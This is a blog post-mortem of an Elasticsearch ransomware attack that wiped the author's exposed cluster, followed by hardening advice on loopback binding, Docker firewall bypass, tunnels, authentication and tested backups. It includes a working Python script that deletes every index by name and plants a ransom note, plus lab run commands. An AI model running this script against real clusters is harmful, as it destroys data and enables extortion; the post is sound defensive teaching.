TechEarl

Elasticsearch Ransomware: How an Open Port Wiped My Database

In May 2026 an automated bot wiped a terabyte of Elasticsearch data on a personal project of mine, through a port I left open. Here is exactly how the ransomware works, why it found me, and the boring one-time fixes that stop it.

Ishan Karunaratne⏱️ 22 min readUpdated
Share thisCopied
How Elasticsearch ransomware wipes your indices through an exposed port 9200 and leaves a read_me note. A real post-mortem, the attack mechanics, and the fixes that actually work.

Most of what I write here is about breaking into things and then closing the holes back up: SQL injection, remote code execution, SSRF, locking down servers, how attackers actually think. I have spent a long time on the offensive side of this, finding these gaps in other people's systems.

Which makes it a particular kind of humbling that in May 2026 a dumb automated bot wiped a terabyte of data off one of my own servers, on a personal project that has nothing to do with this blog, through a port I forgot to close.

No skill was involved. No zero-day, no clever chain, nothing I could even respect. A script swept the internet, found an Elasticsearch node answering on its default port with nobody guarding the door, ran one management command to delete every index, created a new index containing a ransom note, and moved on to the next victim. I was not targeted. I was harvested. This is the Elasticsearch ransomware attack, it happens to thousands of people a year, and this is the full post-mortem: what it does, how it found me, why a "there is a password" assumption did not save me, and the unglamorous one-time fixes that make it impossible.

Elasticsearch ransomware, in one line: an automated bot finds an Elasticsearch node exposed to the internet without authentication, deletes every index through the REST API on port 9200, and creates a read_me index demanding cryptocurrency to restore data it never actually copied. Paying gets you nothing, because there is nothing on the other end to return.

The one-paragraph version

I run a personal project on a fairly large fleet of AWS servers. One of them was a dedicated Elasticsearch box: hundreds of gigabytes of data processed and ingested every day, feeding fast search and retrieval for the front end that consumes it. Over months it had grown to a little over a terabyte, a couple of billion documents spread across many indices. Almost everywhere in that fleet I lock inbound access down to specific IP addresses. On this one box, for reasons I will get to, I had left the data port reachable from the public internet without that restriction. A bot found it, dropped every index, and left me a note. The interesting part is not that it happened. The interesting part is how, and how many independent things had to be wrong at once for a one-line script to win.

How I found out

I did not get an alert from the database. That is the first lesson and I will come back to it. What I got was a part of the website that quietly stopped returning results.

I test my own things constantly, so I noticed quickly that a search-backed section of the site was coming back empty. My first twenty guesses were all wrong, because the one explanation you do not reach for is "the entire database is gone." You check the application. You check the query. You check the network path, the API layer, a bad deploy, a mapping change. The database being empty is so far down the list that it took me a while to even look there.

When I finally queried the cluster directly, the story was obvious and ugly:

bash
curl http://my-es-host:9200/_cat/indices?v

Every index I expected was gone. In their place sat a single index I did not create, with a name like read_me (the exact name varies by campaign: read_me, recover_your_data, readme_to_recover). Inside it, one document: a short note with a cryptocurrency wallet address and an email, claiming my data had been "backed up" and would be "restored" once I paid.

It had not been backed up by anyone. In the overwhelming majority of these campaigns there is no copy. The bot deletes first and demands payment second, betting that a fraction of panicked victims will pay on hope alone. Paying funds the next sweep and gets you nothing, because there is nothing on the other end to return.

How the attack actually works

There is no finesse here, which is exactly why it scales. The whole thing is four REST calls against an open Elasticsearch HTTP API. Elasticsearch's REST API on port 9200 is the management plane: if you can reach it without credentials, you can read, delete, and create anything.

Here is the entire attack, in the order the bot runs it.

1. Find an open node. The attacker does not even scan. Public scan engines like Shodan and Censys already index every internet-facing service continuously. You query them for Elasticsearch responding on 9200 with no authentication and you get a target list. A node's root endpoint cheerfully tells you what it is:

bash
curl http://target:9200/
# {"name":"node-1","cluster_name":"...","version":{"number":"9.x.x", ...},
#  "tagline":"You Know, for Search"}

If that returns JSON instead of a 401 Unauthorized, the node is unauthenticated and the rest is trivial.

2. List the indices. One call enumerates everything worth destroying:

bash
curl http://target:9200/_cat/indices?h=index

3. Delete the data. This is the step people get wrong when they describe the attack. Modern Elasticsearch will refuse a wildcard delete by default (more on that below), so the bot does not bother with DELETE /*. It deletes each index by name, in a loop. Here is the core of it, written plainly:

python
import requests

TARGET = "http://localhost:9200"   # lab target only, see the disclaimer

def wipe(base):
    names = requests.get(f"{base}/_cat/indices?h=index").text.split()
    for name in names:
        requests.delete(f"{base}/{name}")
    return names

Deleting by name sidesteps every "no wildcard deletes" safety setting in one move. That is the whole trick, and it is why that setting is a speed bump and not a wall.

4. Drop the ransom note. Finally it creates a new index and writes a single document so you cannot miss it:

python
def ransom_note(base):
    note = {
        "message": "All your data has been backed up. To restore, send "
                   "0.05 BTC to <wallet> and email <address> with your IP.",
        "warning": "If you do not pay within 48 hours your data is gone.",
    }
    requests.put(f"{base}/read_me", json={})
    requests.post(f"{base}/read_me/_doc", json=note)

That is the entire ransomware. Find, list, delete by name, write note. No human in the loop, no persistence, no lateral movement. The bot never needed to be good. It needed me to be reachable, and I was.

I have a working version of this wired up against a deliberately exposed lab so you can watch it happen end to end, safely, on your own machine. That is at the end of the article. Run it against anything you do not own and you are committing a crime, so do not.

"But there was a password": how an unauthenticated node still happens

Here is the part that stung, and the part most people get wrong about their own setups.

Since Elasticsearch 8.0 (February 2022), security is on by default. A normally installed node generates passwords and TLS certificates on first start, and the HTTP API answers 401 until you authenticate. I was on Elasticsearch 9. So how did an automated bot, which absolutely does not crack passwords, get a fully unauthenticated management API?

The honest answer is the useful one: a bot wiping your cluster is proof the HTTP layer was answering without credentials, regardless of what you believe you configured. Bots do not brute-force Elasticsearch. They hit nodes that respond to anonymous requests. So one of these was true on my box, and they are the same handful of things that are true on most "but I had a password" stories:

  • Security was disabled on that node. The single most common cause. Somewhere in the setup, xpack.security.enabled: false got set, often to "make development easier" or because the node was "only ever going to be internal." Once that flag is off, the REST API has no authentication at all, no matter how strong the password you set elsewhere.
  • The password protected the wrong layer. Elasticsearch has a transport layer (node to node) and an HTTP layer (clients to the REST API). It is entirely possible to have credentials in play for one path while the HTTP API in front of 9200 still answers anonymously, especially in hand-rolled Docker configurations carried forward from an older, pre-8.0 mental model.
  • A reverse-proxy assumption. People put auth on a proxy and assume the node behind it is unreachable, then expose the node directly by accident. The proxy has a password. The node does not.

The uncomfortable truth in my case is that I could not reconstruct the exact mechanism with certainty, because the node was not logging anonymous API access in a way I was collecting and alerting on. "I do not know precisely how they authenticated" is itself a finding: if I had been logging access to the data tier, I would know. The takeaway is not "Elasticsearch is insecure" (9.x is secure by default and the Elastic team has done good work here). The takeaway is that an exposed port plus any one configuration slip equals an unauthenticated database, and you should assume that slip will happen.

The other thing worth saying plainly: before 8.0, an out-of-the-box self-hosted Elasticsearch genuinely was open with no authentication on the free tier. A huge number of the deployment guides, Docker images, and habits people still use today were written in that era. That is why this attack refuses to die even though the current defaults are good. The defaults changed; a decade of muscle memory did not.

The wildcard-delete guard, and why it did not help

Elasticsearch has a cluster setting that refuses destructive operations against wildcard or _all patterns:

json
PUT /_cluster/settings
{ "persistent": { "action.destructive_requires_name": true } }

Here is the part that trips most people up: this setting already defaults to true since Elasticsearch 8.0. A DELETE /* or DELETE /_all is rejected out of the box. So it was almost certainly already on when I got hit, and it did nothing, because the bot never issues a wildcard delete. It enumerates index names and deletes them one at a time, which the guard does not touch.

Keep the setting on. It stops the most common accidental DELETE /* from a tired engineer at 2am, which is a real and valuable thing. Just do not file it under "this protects me from ransomware," because it does not. The only thing that protects you from the ransomware is the bot never reaching the API in the first place.

Why this class of attack is so successful

It helps to internalize that you are not interesting to these people. You are a row in a list a machine generated.

There is a mature, fully automated ecosystem that does nothing but scan the internet for exposed data stores: Elasticsearch, MongoDB, Redis, Kafka, ClickHouse, and friends. A 2024 IEEE study built exactly this kind of reconnaissance engine and ran it across 29 million IP addresses over a full year. Among the databases it catalogued, roughly 40% of the Elasticsearch instances it found had no authentication at all. Forty percent. The same study tracked the ransomware signature directly, looking for Elasticsearch indices named read-me or read_me, and watched the count of infected nodes climb through late 2022 and into 2023. It was not measuring rare events. It was measuring a steady harvest.

The economics are completely one-sided:

  • Scanning is free and continuous. The whole address space gets swept constantly, by attackers and researchers alike. Fresh exposures are found in hours, not weeks.
  • The attack is a script. Connect, list, delete, write note. It costs the operator almost nothing to hit ten thousand servers in a day.
  • Deleting is cheaper than stealing. Exfiltrating a couple of billion documents is slow and bandwidth-heavy. Deleting them and claiming you have a copy is instant. The Meow attack took this to its logical conclusion and skipped the ransom note entirely, just destroying exposed databases for nothing.
  • A few payments fund everything. Most victims never pay. A handful do. At this scale, a handful is profit.

So "why did it work" has a blunt answer: it worked because it is cheap and automatic and I presented an unauthenticated, internet-reachable database. The attack did not need to defeat my defenses. It walked through a gap where a defense should have been.

The part that actually hurt: the backups

I take backups seriously. This is the bit that genuinely made me sad, because I did everything I tell other people to do and still nearly lost everything.

I keep multiple, independent forms of backup. I keep the raw source data that feeds the pipeline, stored separately. And I take daily AWS snapshots of the servers. Belt and suspenders. So when I saw the indices were gone, I was annoyed but calm: I would restore from a snapshot and re-ingest the delta. A bad morning, not a disaster.

Then I went to the snapshots and found that, for reasons specific to how that volume was configured, the snapshot had been excluding the Elasticsearch data the whole time. There was no database snapshot to restore. The one machine where I needed it, the backup I was certain I had, was the backup that was not there.

So I fell back to the raw source data, to rebuild the cluster from scratch by re-running months of ingestion. And in a few places, even the raw data was incomplete. Not catastrophic, the gaps did not matter much in the end, but the pattern was clear: everything that could go a little bit more wrong, did. A terabyte-plus index built up over months had to be rebuilt the slow way, and it took me roughly two to three weeks of grinding re-ingestion to get back to where I was.

The lesson is not "take backups." Everyone says that. The lesson is sharper: a backup you have never restored from is a hypothesis, not a backup. I had three layers of backup and the one that mattered for this exact failure was silently broken, and I only found out at the worst possible moment. Test your restores. Actually run them. The snapshot you have never restored is a guess wearing a backup's clothes.

The rebuild: what "hardened" actually means

I did not patch the old box. I treated it as burned, stood up a clean node on different infrastructure, and brought the lessons across as concrete settings. Here is the playbook in the order that matters, because the order is the point: the first item does ninety percent of the work.

1. Bind the database to loopback, full stop

The data port binds to 127.0.0.1 and nothing else. It is not reachable from any network interface. If you run Elasticsearch in Docker, this is the single most important line in your whole setup:

yaml
ports:
  - "127.0.0.1:9200:9200"   # loopback only, never "9200:9200"

The shorthand 9200:9200 binds to 0.0.0.0, every interface, including the public one. Eleven extra characters is the difference between "reachable only from this host" and "reachable from the entire internet." If I had written those characters originally, there would be no article.

2. Know that Docker can punch through your firewall

This is the trap that catches careful people, so it gets its own section. If you publish a container port, Docker writes its own rules directly into iptables, and they are evaluated before the chains that UFW and firewalld manage. You can have a default-deny host firewall, run ufw status, see a tidy locked-down policy, and still have a published container port wide open to the world underneath it. Your firewall status output is lying to you, not on purpose, but because it does not see Docker's rules.

This single behavior is behind a huge share of "but I had a firewall" database breaches. The loopback bind in step 1 is what actually protects you, because a port bound to 127.0.0.1 is not reachable regardless of what Docker did to iptables. If you genuinely must let Docker publish to a public interface, you manage the DOCKER-USER chain explicitly rather than trusting that UFW covers it. Do not trust the firewall to be your first line here. Trust the bind.

3. Reach the database only through a tunnel, never an open port

My original sin was leaving a port open so I could occasionally reach the box from my home machine. The correct version of that convenience is an authenticated tunnel: a VPN, an SSH tunnel, or an outbound-initiated tunnel like a Cloudflare Tunnel. The database never listens on a public port at all. Access flows back through a connection the server makes, so a scanner sweeping the IP finds nothing listening. There is no open inbound door to find.

If you absolutely must talk to a data store over the public internet, then at the very least restrict the port to specific source IP addresses and block everything else, which is exactly the control I apply everywhere and somehow missed on this one box. An IP allowlist is the weakest of these options (IPs change, and it is one config slip from open), but it is infinitely better than nothing. A VPN or tunnel is the right answer.

4. Authenticate the database itself, and assume the perimeter will fail

Even on a loopback-only port behind a tunnel, the data plane requires credentials and TLS. This is the "assume one layer fails someday" tier. Defense in depth means the database does not trust its network position to be the only thing standing between an attacker and the data. On 9.x this is the default; do not turn it off, and verify it is actually enforced on the HTTP layer by hitting the API without credentials and confirming you get a 401.

5. Keep the destructive guard on (but know its limits)

json
PUT /_cluster/settings
{ "persistent": { "action.destructive_requires_name": true } }

It is the default and it should stay on. It stops accidental wildcard deletes. It will not stop a bot that deletes by name, so it is hygiene, not a control you rely on.

6. Harden the host and back up like you will need it

SSH key-only with passwords disabled, fail2ban on SSH, and then backups done properly: native Elasticsearch snapshots to object storage on a schedule with retention, a separate copy of the raw source data, and crucially, a restore you have actually performed at least once. Verify the snapshot policy includes the data you think it includes. I cannot stress this enough given how my own backups let me down: open the snapshot, list what is in it, restore it somewhere throwaway, confirm the documents are there.

7. Alert on the database, not on the symptom

I found out my cluster was empty because a user-facing page went blank. That means the attacker had the run of the box for an unknown window before anything flagged it. The rebuild added a health check and alert directly on the data tier: document counts, index presence, a heartbeat. If the cluster goes sideways, I get paged, instead of finding out through broken output days later.

Are you exposed right now? Check in five minutes

If you run a self-hosted data store, do these today.

  • Look yourself up on Shodan or Censys. Search for your server's IP. If your database shows up, the entire internet can already see it. This is the fastest reality check there is.
  • List your indices from off the box. From a machine that is not the server, run curl http://your-host:9200/_cat/indices. If you get a response without credentials, you are exposed and unauthenticated, which is the exact precondition for this attack. If you get a 401, good.
  • Check what your container is actually bound to. Run ss -tlnp or docker ps and read the port mapping. 0.0.0.0:9200->9200 or :::9200->9200 is public. 127.0.0.1:9200->9200 is safe. Do not trust your firewall's status to tell you this. Check the bind directly.
  • Look for a ransom index. curl http://localhost:9200/_cat/indices?v and scan for anything named read_me, recover, warning, or similar that you did not create. If it is there, you are already past the "if" stage. See the Meow attack write-up too, since the same exposure gets hit by data-wiping bots that leave no note at all.

Try it safely: the lab

Reading about it is one thing. Watching a script delete a seeded cluster and drop a note in under a second is what makes it stick. I built a self-contained lab in the techearl-labs repo: an Elasticsearch target seeded with realistic indices, bound to loopback, plus the ransomware proof of concept above.

bash
git clone https://github.com/ishankaru/techearl-labs
cd techearl-labs
docker compose up exposed-elasticsearch
# in another shell, seed it then run the PoC against localhost only
./exposed-elasticsearch/seed.sh
python3 exposed-elasticsearch/ransomware/ransom.py http://localhost:9200

The target binds to 127.0.0.1 and the PoC refuses any host that is not loopback, on purpose. The README spells out the safety rules. The point is to see your own indices vanish in a controlled place, then walk the hardening above and watch the same script bounce off a 401.

The lessons, distilled

  1. "I have a firewall" is not "the port is closed." Docker publishes past host firewalls. Verify the actual bind every time. The loopback bind is the real control.
  2. An unauthenticated database is a public database the moment one network control slips. Authenticate the data plane and confirm the HTTP layer enforces it. The perimeter will fail eventually; the database should still say no.
  3. action.destructive_requires_name is hygiene, not armour. It blocks accidental wildcard deletes, not a bot that deletes by name.
  4. You are not too small to be hit. There is no targeting. Automated harvesters sweep the whole internet continuously and find fresh exposures in hours. Obscurity is not a control.
  5. A backup you have never restored is a guess. Verify what your snapshots actually contain. The one time you need it is the worst time to learn it was broken.
  6. Alert on the asset, not the symptom. If you find out your database is gone because users complain, your detection lives in the wrong place.
  7. Never pay. The data is almost never recoverable from the attacker. Paying funds the next sweep and returns nothing.

None of this was sophisticated. I was breached by a script that has hit hundreds of thousands of servers, using the exact playbook it always uses, because I left the exact door open it always looks for. The flip side is the good news: every single root cause has a known, boring, one-time fix. Doing them before the scan finds you is the entire game. The elite end of this industry gets breached too; the sites you would assume are untouchable have all had their day. Security is only ever true for today. Tomorrow there is a new gap, and the work is noticing it before a machine does.

Frequently asked questions

Where to go next

Sources

Authoritative references this article was fact-checked against.

TagsElasticsearchRansomwareDatabase SecurityShodanDockerSecurity

Found this useful? Pass it on.

Copied

Ishan Karunaratne

Software Systems Architect · Senior Software Engineer · Engineering Leadership

Software systems architect and senior software engineer with more than two decades designing, building, and running production software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Now a CTO, though what I write here is drawn from the full arc of that work, across architecture, engineering, and operations, not any single job.

Keep reading

Related posts